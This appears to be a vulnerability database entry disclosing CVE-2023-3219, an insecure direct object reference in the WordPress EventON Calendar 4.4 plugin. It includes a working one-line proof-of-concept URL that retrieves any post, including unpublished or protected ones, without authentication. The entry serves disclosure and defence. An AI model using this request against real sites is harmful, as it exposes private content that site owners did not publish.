Lucene search
Miguel SantarenoPACKETSTORM:173992HistoryAug 04, 2023 - 12:00 a.m.
WordPress EventON Calendar 4.4 Insecure Direct Object Reference
2023-08-0400:00:00
Miguel Santareno
packetstormsecurity.com
69
wordpress
eventon calendar
unauthenticated access
insecure direct object reference
post access
idor
cve-2023-3219
0.113 Low
EPSS
Percentile
95.2%
`# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-3219
# 1. Description
The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>
`
Related
wpvulndb
wpvulndb
EventON < 2.1.2 - Unauthenticated Post Access via IDOR
2023-06-19 00:00:00
cve
cve
CVE-2023-3219
2023-07-10 16:15:55
nvd
nvd
CVE-2023-3219
2023-07-10 16:15:55
zdt
zdt
wpexploit
wpexploit
EventON < 2.1.2 - Unauthenticated Post Access via IDOR
2023-06-19 00:00:00
prion
prion
Code injection
2023-07-10 16:15:00
nuclei
nuclei
EventON Lite < 2.1.2 - Arbitrary File Download
2023-10-17 07:20:28
cvelist
cvelist
CVE-2023-3219 EventON < 2.1.2 - Unauthenticated Post Access via IDOR
2023-07-10 12:41:20
exploitdb
exploitdb
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
2023-08-04 00:00:00
wordfence
wordfence